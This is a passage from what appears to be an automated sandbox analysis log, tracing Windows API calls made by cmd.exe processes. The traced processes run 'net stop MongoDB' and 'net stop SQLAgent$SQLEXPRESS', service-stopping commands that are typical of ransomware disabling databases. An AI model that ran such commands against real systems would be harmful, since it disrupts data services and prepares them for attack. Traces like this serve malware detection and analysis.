_String2="TIME") returned -6 [0069.553] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.553] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.553] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.553] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.554] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.554] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.554] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.554] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.554] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.554] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.554] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.554] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.554] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.554] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.554] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.554] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.554] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.554] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.554] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.554] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.554] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.554] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.554] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.554] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.554] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.554] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.554] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.554] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.554] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0069.554] _wcsicmp (_String1="net", _String2="IF") returned 5 [0069.554] _wcsicmp (_String1="net", _String2="REM") returned -4 [0069.554] GetProcessHeap () returned 0x7e0000 [0069.554] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x210) returned 0x7f3068 [0069.554] GetProcessHeap () returned 0x7e0000 [0069.554] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x2c) returned 0x7f3280 [0069.555] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0069.555] GetProcessHeap () returned 0x7e0000 [0069.555] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x418) returned 0x7e07f0 [0069.555] SetErrorMode (uMode=0x0) returned 0x0 [0069.555] SetErrorMode (uMode=0x1) returned 0x0 [0069.555] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7e07f8, lpFilePart=0x37f4f4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x37f4f4*="Desktop") returned 0x25 [0069.555] SetErrorMode (uMode=0x0) returned 0x1 [0069.555] GetProcessHeap () returned 0x7e0000 [0069.555] RtlReAllocateHeap (Heap=0x7e0000, Flags=0x0, Ptr=0x7e07f0, Size=0x5c) returned 0x7e07f0 [0069.555] GetProcessHeap () returned 0x7e0000 [0069.555] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0x7e07f0) returned 0x5c [0069.555] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.555] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0069.555] GetProcessHeap () returned 0x7e0000 [0069.555] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x120) returned 0x7f32b8 [0069.555] GetProcessHeap () returned 0x7e0000 [0069.555] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x238) returned 0x7e0858 [0069.562] GetProcessHeap () returned 0x7e0000 [0069.562] RtlReAllocateHeap (Heap=0x7e0000, Flags=0x0, Ptr=0x7e0858, Size=0x122) returned 0x7e0858 [0069.562] GetProcessHeap () returned 0x7e0000 [0069.562] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0x7e0858) returned 0x122 [0069.562] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.562] GetProcessHeap () returned 0x7e0000 [0069.562] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xe0) returned 0x7f33e0 [0069.562] GetProcessHeap () returned 0x7e0000 [0069.562] RtlReAllocateHeap (Heap=0x7e0000, Flags=0x0, Ptr=0x7f33e0, Size=0x76) returned 0x7f33e0 [0069.562] GetProcessHeap () returned 0x7e0000 [0069.562] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0x7f33e0) returned 0x76 [0069.563] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.563] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x37f270, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37f270) returned 0xffffffff [0069.563] GetLastError () returned 0x2 [0069.563] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x37f270, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37f270) returned 0xffffffff [0069.564] GetLastError () returned 0x2 [0069.564] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.564] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x37f270, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37f270) returned 0x7f3460 [0069.564] GetProcessHeap () returned 0x7e0000 [0069.564] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x14) returned 0x7f34a0 [0069.564] FindClose (in: hFindFile=0x7f3460 | out: hFindFile=0x7f3460) returned 1 [0069.564] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x37f270, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37f270) returned 0xffffffff [0069.564] GetLastError () returned 0x2 [0069.564] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x37f270, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37f270) returned 0x7f3460 [0069.564] GetProcessHeap () returned 0x7e0000 [0069.564] RtlReAllocateHeap (Heap=0x7e0000, Flags=0x0, Ptr=0x7f34a0, Size=0x4) returned 0x7f34a0 [0069.564] FindClose (in: hFindFile=0x7f3460 | out: hFindFile=0x7f3460) returned 1 [0069.564] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0069.564] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0069.564] GetConsoleTitleW (in: lpConsoleTitle=0x37f768, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.565] InitializeProcThreadAttributeList (in: lpAttributeList=0x37f5f0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x37f6b8 | out: lpAttributeList=0x37f5f0, lpSize=0x37f6b8) returned 1 [0069.565] UpdateProcThreadAttribute (in: lpAttributeList=0x37f5f0, dwFlags=0x0, Attribute=0x60001, lpValue=0x37f6b0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x37f5f0, lpPreviousValue=0x0) returned 1 [0069.565] GetStartupInfoW (in: lpStartupInfo=0x37f5ac | out: lpStartupInfo=0x37f5ac*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0069.565] GetProcessHeap () returned 0x7e0000 [0069.565] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x18) returned 0x7f3460 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.565] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0069.566] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0069.566] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0069.566] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0069.566] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0069.566] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0069.566] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0069.566] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0069.566] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0069.566] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0069.566] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0069.566] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.566] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.566] GetProcessHeap () returned 0x7e0000 [0069.566] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x7f3460 | out: hHeap=0x7e0000) returned 1 [0069.566] GetProcessHeap () returned 0x7e0000 [0069.566] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xa) returned 0x7eff18 [0069.566] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0069.567] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MongoDB", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x37f64c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MongoDB", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x37f698 | out: lpCommandLine="net stop MongoDB", lpProcessInformation=0x37f698*(hProcess=0x78, hThread=0x74, dwProcessId=0x9fc, dwThreadId=0x7fc)) returned 1 [0070.041] CloseHandle (hObject=0x74) returned 1 [0070.041] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0070.041] GetProcessHeap () returned 0x7e0000 [0070.041] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x7f5ef8 | out: hHeap=0x7e0000) returned 1 [0070.041] GetEnvironmentStringsW () returned 0x7f5ef8* [0070.041] GetProcessHeap () returned 0x7e0000 [0070.041] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xb36) returned 0x7f40b8 [0070.041] FreeEnvironmentStringsW (penv=0x7f5ef8) returned 1 [0070.041] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0072.348] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x37f58c | out: lpExitCode=0x37f58c*=0x2) returned 1 [0072.348] CloseHandle (hObject=0x78) returned 1 [0072.348] _vsnwprintf (in: _Buffer=0x37f6d4, _BufferCount=0x13, _Format="%08X", _ArgList=0x37f598 | out: _Buffer="00000002") returned 8 [0072.349] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0072.349] GetProcessHeap () returned 0x7e0000 [0072.349] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x7f40b8 | out: hHeap=0x7e0000) returned 1 [0072.349] GetEnvironmentStringsW () returned 0x7f40b8* [0072.349] GetProcessHeap () returned 0x7e0000 [0072.349] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xb5c) returned 0x7f95a0 [0072.349] FreeEnvironmentStringsW (penv=0x7f40b8) returned 1 [0072.349] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0072.349] GetProcessHeap () returned 0x7e0000 [0072.349] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x7f95a0 | out: hHeap=0x7e0000) returned 1 [0072.349] GetEnvironmentStringsW () returned 0x7f40b8* [0072.349] GetProcessHeap () returned 0x7e0000 [0072.349] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xb5c) returned 0x7f95a0 [0072.349] FreeEnvironmentStringsW (penv=0x7f40b8) returned 1 [0072.349] GetProcessHeap () returned 0x7e0000 [0072.349] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x7eff18 | out: hHeap=0x7e0000) returned 1 [0072.349] DeleteProcThreadAttributeList (in: lpAttributeList=0x37f5f0 | out: lpAttributeList=0x37f5f0) [0072.349] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.349] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0072.350] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.350] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0072.350] _get_osfhandle (_FileHandle=0) returned 0x3 [0072.350] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0072.350] SetConsoleInputExeNameW () returned 0x1 [0072.350] GetConsoleOutputCP () returned 0x1b5 [0072.350] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0072.350] SetThreadUILanguage (LangId=0x0) returned 0x409 [0072.350] exit (_Code=2) Process: id = "35" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x230f4000" os_pid = "0x36c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "18" os_parent_pid = "0x8d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cedf" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 73 os_tid = 0xb04 Thread: id = 74 os_tid = 0xb00 Thread: id = 75 os_tid = 0xaf8 Thread: id = 76 os_tid = 0xaf4 Thread: id = 77 os_tid = 0xaf0 Thread: id = 78 os_tid = 0xaec Thread: id = 79 os_tid = 0xae8 Thread: id = 80 os_tid = 0xae4 Thread: id = 81 os_tid = 0xae0 Thread: id = 82 os_tid = 0xadc Thread: id = 83 os_tid = 0xad8 Thread: id = 84 os_tid = 0xad4 Thread: id = 85 os_tid = 0xad0 Thread: id = 86 os_tid = 0x5d0 Thread: id = 87 os_tid = 0x5b4 Thread: id = 88 os_tid = 0x7f8 Thread: id = 89 os_tid = 0x430 Thread: id = 90 os_tid = 0x268 Thread: id = 91 os_tid = 0x768 Thread: id = 92 os_tid = 0x764 Thread: id = 93 os_tid = 0x760 Thread: id = 94 os_tid = 0x75c Thread: id = 95 os_tid = 0x70c Thread: id = 96 os_tid = 0x6e8 Thread: id = 97 os_tid = 0x6c8 Thread: id = 98 os_tid = 0x6c0 Thread: id = 99 os_tid = 0x6b8 Thread: id = 100 os_tid = 0x6a4 Thread: id = 101 os_tid = 0x6a0 Thread: id = 102 os_tid = 0x690 Thread: id = 103 os_tid = 0x67c Thread: id = 104 os_tid = 0x490 Thread: id = 105 os_tid = 0x454 Thread: id = 106 os_tid = 0x450 Thread: id = 107 os_tid = 0x428 Thread: id = 108 os_tid = 0x424 Thread: id = 109 os_tid = 0x420 Thread: id = 110 os_tid = 0x404 Thread: id = 111 os_tid = 0x18c Thread: id = 112 os_tid = 0xf0 Thread: id = 113 os_tid = 0xc8 Thread: id = 114 os_tid = 0x3f0 Thread: id = 115 os_tid = 0x3e4 Thread: id = 116 os_tid = 0x398 Thread: id = 117 os_tid = 0x394 Thread: id = 118 os_tid = 0x390 Thread: id = 119 os_tid = 0x38c Thread: id = 120 os_tid = 0x378 Thread: id = 121 os_tid = 0x370 Thread: id = 136 os_tid = 0x5b0 Thread: id = 137 os_tid = 0x594 Thread: id = 141 os_tid = 0x970 Thread: id = 142 os_tid = 0x944 Thread: id = 143 os_tid = 0x938 Thread: id = 144 os_tid = 0x93c Thread: id = 233 os_tid = 0x5a4 Thread: id = 234 os_tid = 0x64 Thread: id = 235 os_tid = 0x8cc Thread: id = 236 os_tid = 0x694 Thread: id = 276 os_tid = 0x958 Thread: id = 278 os_tid = 0x210 Thread: id = 279 os_tid = 0x898 Thread: id = 280 os_tid = 0x918 Thread: id = 281 os_tid = 0x988 Thread: id = 282 os_tid = 0x920 Thread: id = 283 os_tid = 0x804 Thread: id = 284 os_tid = 0x9ac Thread: id = 285 os_tid = 0x848 Thread: id = 298 os_tid = 0x330 Process: id = "36" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1fb94000" os_pid = "0x780" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c net stop SQLAgent$SQLEXPRESS" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 129 os_tid = 0x240 [0068.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x42fab0 | out: lpSystemTimeAsFileTime=0x42fab0*(dwLowDateTime=0x97c22bb0, dwHighDateTime=0x1d57b18)) [0068.636] GetCurrentProcessId () returned 0x780 [0068.636] GetCurrentThreadId () returned 0x240 [0068.636] GetTickCount () returned 0x114b211 [0068.636] QueryPerformanceCounter (in: lpPerformanceCount=0x42faa8 | out: lpPerformanceCount=0x42faa8*=18885733328) returned 1 [0068.637] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0068.637] __set_app_type (_Type=0x1) [0068.637] __p__fmode () returned 0x74eb31f4 [0068.637] __p__commode () returned 0x74eb31fc [0068.637] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0068.637] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0068.637] GetCurrentThreadId () returned 0x240 [0068.637] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x240) returned 0x60 [0068.638] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0068.638] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0068.638] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.638] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0068.638] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x42fa40 | out: phkResult=0x42fa40*=0x0) returned 0x2 [0068.638] VirtualQuery (in: lpAddress=0x42fa77, lpBuffer=0x42fa10, dwLength=0x1c | out: lpBuffer=0x42fa10*(BaseAddress=0x42f000, AllocationBase=0x330000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.638] VirtualQuery (in: lpAddress=0x330000, lpBuffer=0x42fa10, dwLength=0x1c | out: lpBuffer=0x42fa10*(BaseAddress=0x330000, AllocationBase=0x330000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0068.638] VirtualQuery (in: lpAddress=0x331000, lpBuffer=0x42fa10, dwLength=0x1c | out: lpBuffer=0x42fa10*(BaseAddress=0x331000, AllocationBase=0x330000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0068.638] VirtualQuery (in: lpAddress=0x333000, lpBuffer=0x42fa10, dwLength=0x1c | out: lpBuffer=0x42fa10*(BaseAddress=0x333000, AllocationBase=0x330000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.638] VirtualQuery (in: lpAddress=0x430000, lpBuffer=0x42fa10, dwLength=0x1c | out: lpBuffer=0x42fa10*(BaseAddress=0x430000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x120000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0068.638] GetConsoleOutputCP () returned 0x1b5 [0068.638] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0068.639] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0068.639] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.639] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0068.639] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.639] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0068.639] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.639] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.639] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.639] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0068.640] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.640] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0068.640] GetEnvironmentStringsW () returned 0x742048* [0068.640] GetProcessHeap () returned 0x730000 [0068.640] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0xaca) returned 0x742b20 [0068.640] FreeEnvironmentStringsW (penv=0x742048) returned 1 [0068.640] GetProcessHeap () returned 0x730000 [0068.640] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x4) returned 0x740c80 [0068.640] GetEnvironmentStringsW () returned 0x742048* [0068.640] GetProcessHeap () returned 0x730000 [0068.640] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0xaca) returned 0x7435f8 [0068.640] FreeEnvironmentStringsW (penv=0x742048) returned 1 [0068.640] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x42e9b0 | out: phkResult=0x42e9b0*=0x68) returned 0x0 [0068.641] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x42e9b8, lpData=0x42e9bc, lpcbData=0x42e9b4*=0x1000 | out: lpType=0x42e9b8*=0x0, lpData=0x42e9bc*=0x0, lpcbData=0x42e9b4*=0x1000) returned 0x2 [0068.641] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x42e9b8, lpData=0x42e9bc, lpcbData=0x42e9b4*=0x1000 | out: lpType=0x42e9b8*=0x4, lpData=0x42e9bc*=0x1, lpcbData=0x42e9b4*=0x4) returned 0x0 [0068.641] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x42e9b8, lpData=0x42e9bc, lpcbData=0x42e9b4*=0x1000 | out: lpType=0x42e9b8*=0x0, lpData=0x42e9bc*=0x1, lpcbData=0x42e9b4*=0x1000) returned 0x2 [0068.641] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x42e9b8, lpData=0x42e9bc, lpcbData=0x42e9b4*=0x1000 | out: lpType=0x42e9b8*=0x4, lpData=0x42e9bc*=0x0, lpcbData=0x42e9b4*=0x4) returned 0x0 